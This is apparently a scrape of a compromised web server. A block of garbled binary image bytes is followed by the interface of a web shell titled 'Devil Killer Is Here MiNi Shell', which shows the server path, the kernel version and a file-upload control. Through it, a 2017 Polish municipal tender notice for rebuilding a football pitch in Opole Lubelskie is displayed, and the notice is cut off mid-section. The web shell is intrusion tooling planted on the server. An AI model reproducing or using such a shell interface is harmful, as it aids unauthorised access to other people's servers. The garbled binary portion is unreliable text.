JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170203/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170203/19658-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href=' http://umopolelubelskie.bip.lubelskie.pl' target='_blank'> http://umopolelubelskie.bip.lubelskie.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 19658 - 2017
              z dnia 2017-02-03 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Opole Lubelskie: Przebudowa boiska piłkarskiego przy ul. Kolejowej 17 w Opolu Lubelskim<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Zadanie współfinansowane ze środków Funduszu Rozwoju Kultury Fizycznej w ramach Programu Modernizacji Infrastruktury Sportowej Ministerstwa Sportu i Turystyki.</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Opole Lubelskie, krajowy numer identyfikacyjny
              43102002600000, ul.
              ul. Lubelska 
              4,
              24300  
              Opole Lubelskie, woj.
              brak, państwo
              Polska, tel.
              81 827 72 01, e-mail
              sekretariat@opolelubelskie.pl, faks
              81 827 72 00.
              <br />
              Adres strony internetowej (URL):  http://umopolelubelskie.bip.lubelskie.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br /> http://umopolelubelskie.bip.lubelskie.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br /> http://umopolelubelskie.bip.lubelskie.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemnie, zgodnie  zasadami określonymi w Części XI  i XII SIWZ<br />
                Adres:
                <br />Urząd Mieski w Opolu Lubelskm ul. Lubelska 4, 24-300 Opole Lubelskie w Punkcie Obsługi Klienta (parter UM)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa boiska piłkarskiego przy ul. Kolejowej 17 w Opolu Lubelskim<br /><b>Numer referencyjny: </b>IPR.271.2.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiot zamówienia obejmuje:
1)	Przebudowę boiska piłkarskiego pełnowymiarowego z nawierzchnią z trawy naturalnej. Boisko o wymiarach pola gry 105x68m. Dookoła boiska pozostawiono pas bezpieczeństwa o szerokości 3,0m od linii bocznych boiska oraz 5,0 m od linii bramkowych. Nawierzchnia boiska wysiewana z mieszanki traw odpornych na zadeptanie. Projektowane warstwy konstrukcji nawierzchni boiska piłkarskiego zaczynając od góry: wierzchnia warstwa wegetatywna ziemi z wysianą trawą gr. min. 15 cm (PH 5,5-6,5), oraz wykonanie warstw podbudowy i drenażu. Projektowana rzędna boiska jest wyniesiona o około 60-90 cm w stosunku do istniejącej rzędnej.  Projektowana murawa z mieszanki traw musi spełniać odpowiednią normę ISA dla boisk trawiastych, natomiast przygotowane podłoże powinno spełniać warunki normy DIN 18035-4.  Zamawiający zastrzega, że będzie żądał badań laboratoryjnych składu  wszystkich warstw podbudowy i wierzchniej warstwy wegetatywnej, składu mieszanki trwa przed ich wbudowaniem.
Przewiduje się demontaż istniejącej murawy boiska wraz z rolowaniem, transportem na odległość do 3 km oraz wbudowaniem murawy na wykonanej uprzednio przez Wykonawcę warstwie urodzajnej na terenie otwartej strefy sportowo  rekreacyjnej zlokalizowanej w Opolu Lubelskim przy ul. Szkolnej 5. Przewiduje się również demontaż istniejącego wyposażenia. Zamawiający zastrzega, że wszelkie zdemontowane materiały, urządzenia, wyposażenie posiadające wartość użytkową winno być przekazane protokołem zdawczo  odbiorczym Zamawiającemu oraz przewiezione w miejsce wskazane przez Zamawiającego na terenie miasta Opole Lubelskie. Oceny przydatności do użytku dokonuje Zamawiający. Demontaż istniejących urządzeń do ponownego wykorzystania należy dokonywać z należytą starannością.
2)	Roboty ziemne wraz z budową kanalizacji deszczowej (drenażu) odwadniającego płytę boiska oraz terenu przyległego. Przewiduje się również na działce nr 27/9 (dawny numer 27/8) przebudowę istniejącej kanalizacji deszczowej wraz z wymianą rur, studni oraz konserwację rowów melioracyjnych odprowadzających wody opadowe i roztopowe z terenu boiska. Przeznaczone do wywozu z terenu budowy masy ziemne należy przetransportować w miejsce wskazane przez Zamawiającego na odległość określoną w przedmiarze robót. 
3)	Przebudowę nasypu ziemnego usytuowanego po północnej stronie boiska piłkarskiego, gdzie zlokalizowano małą trybunę ziemną dla widowni w ilości 124 miejsca. W tej strefie przewidziano również lokalizację dwóch boksów z siedziskami dla zawodników rezerwowych oraz sektor dla kibiców drużyny gości wraz z siedziskami.
4)	Dostawę i montaż bramek do piłki nożnej z siatkami, chorągiewek przegubowych oraz wykonanie linii separacyjnych boiska oraz dostawę pozostałego sprzętu do konserwacji płyty boiska.
5)	Dostawę i montaż piłkochwytów systemowych o wysokości 6,0 m w ilości 2 komplety usytuowanych za bramkami do piłki nożnej. 
6)	Dostawę i montaż boksów mobilnych dla zawodników rezerwowych wraz z siedziskami  2 komplety.
7)	Budowę ogrodzenia bezpośredniego boiska o wysokości 1,20 m z  paneli stalowych zgrzewanych systemowych z zastosowaniem słupków stalowych systemowych. Długość ogrodzenia ok. 358 mb. W ogrodzeniu umieszczono bramy ewakuacyjne i gospodarcze pozwalające na komunikację pomiędzy boiskiem, szatniami oraz istniejącą trybuną ziemną od strony północnej boiska.
8)	Budowę ogrodzenia sektora kibiców drużyny gości o wysokości 2,20m z bramami (wejściową i ewakuacyjną).
9)	Budowę zewnętrznego ogrodzenia obiektu sportowego (front od strony wschodniej wysokość 2,03m, pozostałe wysokość 1,80m) z uprzednią rozbiórka starego ogrodzenia wraz z cokołem betonowym. 
10)	W celu zapewnienia możliwości nawadniania murawy boiska przewiduje się dwie studnie z zaworami czerpalnymi usytuowane w okolicach bramek oraz instalację wewnętrzną wodociągową zasilającą zawory czerpalne z sieci wewnętrznej z opomiarowaniem. 
11)	Budowę oświetlenia boiska typu sportowego w postaci projektorów halogenowych na masztach stalowych w ilości 6 szt. rozmieszczonych po dłuższych bokach boiska. 
12)	Budowę ciągów pieszo- jezdnych, w tym drogi pożarowe oraz chodników.  
13)	Budowę trybuny żelbetowej z siedziskami na 537 miejsc plus dwa miejsca dla niepełnosprawnych, w tym częściowo zadaszonych oraz budowę pomieszczenia dla spikera wraz z instalacją elektryczną i instalacją odgromową zadaszenia trybuny.
14)	Wykonanie miejsc postojowych dla samochodów drużyny gości o nawierzchni z klińca drogowego oraz bramą wjazdową i furtką w ogrodzeniu.
15)	Budowa nowego przyłącza wodociągowego z działki nr 79/9 położonej przy ul. Kolejowej do skrzyżowania z komorą wodomierzową oraz wykonanie instalacji wodociągowej na terenie działki nr ew. 56 doziemnej wraz z przełączeniem do nowej instalacji dotychczasowych odbiorców wody i instalacji do podlewania płyty boiska (zasilonych z kolidującego z płytą boiska przyłącza wodociągowego). Po wykonaniu nowego przyłączą wodociągowego oraz instalacji wodociągowej doziemnej i przełączeniu odbiorców należy dokonać odłączenia kolizyjnego przyłącza na działce nr 56 z wykonaniem odpowiedniego zabezpieczenia na granicy działki.  Roboty związane z budową przyłącza i przełączaniem odbiorców oraz odłączenie  kolizyjnego przyłącza należy uprzednio uzgodnić z Opolskim Przedsiębiorstwem Komunalnym, który eksploatuje sieci wodociągowe. Miejsce odłączenia  w granicy działki nr 56 należy obrukować i oznakować słupkiem znacznikowym. 
16)	Pielęgnację płyty boiska  o nawierzchni z trawy naturalnej. W skład pielęgnacji wchodzi: koszenie murawy, nawadnianie, dosiewanie trawy (uzupełnienie) w przypadku stwierdzenia wypadów, podlewanie (w częstotliwości uzależnionej od warunków atmosferycznych) - według potrzeb, uzupełnianie wypadów nasadzeń, odchwaszczanie - według potrzeb, nawożenie  według potrzeb. Wykonawca przedłoży instrukcję pielęgnacji murawy boiska i określi harmonogram czynności związanych z pielęgnacją i przekaże go Zamawiającemu najpóźniej  w dniu odbioru końcowego zadania. W  celu uzyskania optymalnych parametrów jakości murawy boiska na dzień końcowego odbioru robót zaleca się aby Wykonawca w przygotowanym harmonogramie rzeczowo- finansowym  uwzględnił budowę płyty boiska wraz z wykonaniem nawierzchni z trawy naturalnej w pierwszej kolejności, uwzględniając odpowiednie warunki atmosferyczne w trakcie realizacji robót oraz konserwację murawy minimum 6 miesięcy. 
2.	Wykonawca będzie realizował roboty budowalne związane z przebudową boiska w oparciu o:
1)	projekt budowlany zatwierdzony prawomocną decyzją o pozwoleniu na budowę nr 54/2014 z dnia 28.02.2014 r., z uwzględnieniem faktu, że Zamawiający w roku 2016 na terenie działki nr ew. 56 zaprojektował rozbudowę wielofunkcyjnego budynku przy ul. Kolejowej 17 z przeznaczeniem na dzienny dom pomocy społecznej oraz budowę zaplecza sanitarnego strefy fitness na działce nr 56, co wynika z projektu budowlanego zamiennego zatwierdzonego prawomocną decyzją nr 352/2016 z dnia 07.09.2016 r. dotyczącą przebudowy z rozbudową wielofunkcyjnego budynku przy ul. Kolejowej 17 z przeznaczeniem na dzienny dom pomocy społecznej oraz budowy zaplecza sanitarnego strefy fitness na działce nr 56. Zamawiający przewiduje realizację robót wynikających z projektu zamiennego w drugim etapie. Wykonawca w celu prawidłowego wykonania zamówienia winien czytać łącznie załączony do SIWZ projekt pierwotny wraz ze zmianami wynikającymi z projektu zamiennego. 
2)	projekt budowlany przyłącza wodociągowego dla Utworzenia strefy rekreacyjno- sportowej przy ul. Kolejowej 17 w Opolu Lubelskim w części dotyczącej przebudowy z rozbudową wielofunkcyjnego budynku przy ul. Kolejowej 17 z przeznaczeniem na dzienny dom pomocy społecznej oraz budowy zaplecza sanitarnego strefy fitness na działce nr 56. Przyłącze Wykonawca będzie realizował w oparciu o projekt przyłącza, natomiast instalacje wodociągową zewnętrzną doziemną w oparciu o projekt instalacji sanitarnych będący częścią składową projektu zamiennego. Do obowiązków Wykonawcy będzie należało uzyskanie decyzji z Zarządu Dróg Powiatowych w zakresie zajęcia pasa drogowego w celu wykonania przyłączą wodociągowego w pasie drogi powiatowej oraz na umieszczenie przyłącza;
3)	przedmiar robót w zakresie wbudowania zrolowanej uprzednio z terenu boiska piłkarskiego murawy na terenie otwartej strefy sportowo- rekreacyjnej zlokalizowanej w Opolu Lubelskim przy ul. Szkolnej. 
4)	Roboty należy realizować również w oparciu o opracowany projekt zmian nieistotnych do pierwotnego projektu  objętych pozwoleniem na budowę nr 54/2014 z dnia 28.02.2014 r. datowany na październik 2016.
5)	W celu prawidłowego określenia przez Wykonawcę  zakresu robót objętego niniejszym  zamówieniem Zamawiający uściśla przekazaną powyżej informację. Wykonawca tego zamówienia będzie realizował roboty na działkach nr ew. 56,169, 27/1, 27/9 (dawny numer 27/8) z wyłączeniem obszaru na działce nr 56 oznaczonego na planie zagospodarowania projektu zamiennego literami a,b,c,d (I,II,III,IV), który to obszar będzie realizowany w II etapie.  Wykonawca będzie również realizował w ramach tego zadania przyłącze wodociągowe z działki nr 79/9 przez działkę drogową (nr 78) do komory wodomierzowej na działce nr 56 oraz instalację wodociągową zewnętrzną od komory wodomierzowej według projektu instalacji sanitarnych będącego częścią składową projektu zamiennego obszaru a, b, c, d (wraz z przełączeniem dotychczasowych odbiorców i instalacji do podlewania murawy boiska). Jednocześnie Wykonawca powinien uwzględnić zmiany nieistotne do projektu pierwotnego z 2014 roku oraz konieczność wbudowania zrolowanej murawy na terenie otwartej strefy sportowo  rekreacyjnej zlokalizowanej w Opolu Lubelskim przy ul. Szkolnej 5. 
6)	Zamawiający informuje, że w I kwartale roku 2017 planowane jest rozpoczęcie realizacji budowy kanalizacji sanitarnej w ciągu ul. Kolejowej, w bezpośrednim sąsiedztwie boiska piłkarskiego. Na terenie budowy na działce nr 56 planowana jest budowa pompowni ścieków sanitarnych zgodnie z decyzją o pozwoleniu na budowę z roku 2015.  Wykonawca jest zatem obowiązany do udostepnienia części placu budowy na potrzeby budowy przepompowni ścieków i sieci kanalizacji  sanitarnej. Wykonawca jest obowiązany do współpracy i koordynacji prac z Wykonawcą budowy kanalizacji sanitarnej w celu zapewnienia prawidłowego przebiegu robót. Jednocześnie Zamawiający przewiduje możliwość wykonywania robót związanych z budową dziennego domu pomocy społecznej na działce nr 56 o ile zostanie pozyskane dofinansowanie na ten cel.
3.	Jeżeli w SIWZ, przy opisie przedmiotu zamówienia użyte są  znaki towarowe, patenty lub pochodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę,  Zamawiający wymaga, aby traktować takie wskazanie jako przykładowe i dopuszcza  składanie ofert z rozwiązaniami równoważnymi, o ile zapewnią one zgodność realizacji przedmiotu zamówienia z SIWZ wraz z załącznikami.
4.	Szczegółowy zakres zamówienia obejmuje: 
1) dokumentacja projektowa, w tym projekt budowlany zatwierdzony prawomocną decyzją o pozwoleniu na budowę nr 54/2014 z dnia 28.02.2014 r.  załącznik nr 8 do SIWZ,
2) dokumentacja projektowa, w tym projekt budowlany zamienny zatwierdzony decyzją o pozwoleniu na budowę z nr 352/2016 z dnia 07.09.2016 r. dotyczącą przebudowy z rozbudową wielofunkcyjnego budynku przy ul. Kolejowej 17 z przeznaczeniem na dzienny dom pomocy społecznej oraz budowy zaplecza sanitarnego strefy fitness na działce nr 56.- załącznik nr 9 do SIWZ;
3) dokumentacja projektowa dotycząca przyłącza wodociągowego  załącznik nr11 do SIWZ;
4) przedmiar robót dotyczący wbudowania zrolowanej murawy na terenie otwartej strefy sportowo  rekreacyjnej zlokalizowanej  w Opolu Lubelskim przy ul. Szkolnej 5  załącznik nr 10 do SIWZ.
5) przedmiar robót dotyczący wykonania instalacji wodociągowej wewnętrznej doziemnej w celu likwidacji kolizji i przełączenia odbiorców  załącznik nr 12 do SIWZ.  
5.	Warunki wykonania zamówienia zawarte są we wzorze umowy stanowiącym załącznik 
nr 7 do SIWZ.
7.	 Zamawiający dopuszcza korzystanie z podwykonawców. Wykonawca:
a)	jest zobowiązany wskazać w formularzu ofertowym (załącznik nr 1 do SIWZ) części zamówienia, których wykonanie zamierza powierzyć podwykonawcom i podać firmy (oznaczenie przedsiębiorstwa) podwykonawców; 
b)	w przypadku podpisania umowy Wykonawca będzie zobowiązany, aby przed przystąpieniem do wykonania zamówienia  podał - o ile są już znane, nazwy albo imiona i nazwiska oraz dane kontaktowe podwykonawców i osób do kontaktu z nimi, zaangażowanych w  usługi. Wykonawca będzie zawiadamiał zamawiającego o wszelkich zmianach danych, dotyczących  podwykonawców w trakcie realizacji zamówienia, a także przekazywał informacje na temat nowych podwykonawców, którym w późniejszym okresie zamierza powierzyć realizację robót budowlanych lub usług. Wykonawca będzie zobowiązany zgłosić podwykonawców na zasadach określonych w przepisach art. 143 b ustawy prawo zamówień publicznych.
c)	Jeżeli późniejsza zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 22a ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest zobowiązany wskazać Zamawiającemu, że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełniają je w stopniu nie mniejszym niż Podwykonawca, na którego zasoby wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.
Kary umowne za nieprawidłowe zgłaszanie podwykonawców oraz realizowanie na ich rzecz płatności określone są we wzorze umowy.

d)	Zamawiający określa obowiązek zatrudnienia na podstawie umowy o pracę wszystkich osób wykonujących następujące czynności  w zakresie realizacji przedmiotu zamówienia:
wykonywanie prac objętych zakresem zamówienia wskazanym w Części III SIWZ w tym  prac fizycznych oraz operatorów sprzętu, jeżeli wykonywanie tych czynności polega na wykonywaniu pracy w rozumieniu przepisów kodeksu pracy. Obowiązek ten dotyczy także podwykonawców  wykonawca jest zobowiązany zawrzeć w każdej umowie o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców do zatrudnienia na umowę o pracę wszystkich osób  wykonujących wskazane wyżej czynności. Szczegółowe zasady dokumentowania zatrudnienia na podstawie umowy o prace oraz kontrolowanie tego obowiązku przez zamawiającego zawarto we wzorze umowy stanowiącym załącznik nr 7 do SIWZ.
<br /><br /><b>II.5) Główny kod CPV: </b>45212221-1<br /><b> Dodatkowe kody CPV:</b>45100000-8,
                45112500-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający  przewiduje  możliwość udzielenia zamówień o których mowa w art. 67 ust. 1 pkt 6. Zamówienia będą polegały na powtórzeniu podobnych robót budowlanych maksymalnie do 20 % wartości zamówienia podstawowego. <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/10/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamawiający określa następujące terminy wykonania zamówienia:
1) od dnia podpisania umowy do 30.08.2018 r. wykonanie robót budowlanych wraz ze złożeniem dokumentów niezbędnych dla Zamawiającego do wystąpienia z wnioskiem o pozwolenie na użytkowanie do właściwego organu.
2) do dnia 30.10.2018 r. dokonanie odbioru końcowego zadania, potwierdzonego podpisaniem protokołu odbioru końcowego, który to odbiór może być dokonany pod warunkiem uzyskania prawomocnego pozwolenia na użytkowanie inwestycji. 
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa szczegółowego sposobu spełnienia tego warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa szczegółowego sposobu spełnienia tego warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że:
a)	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał : 
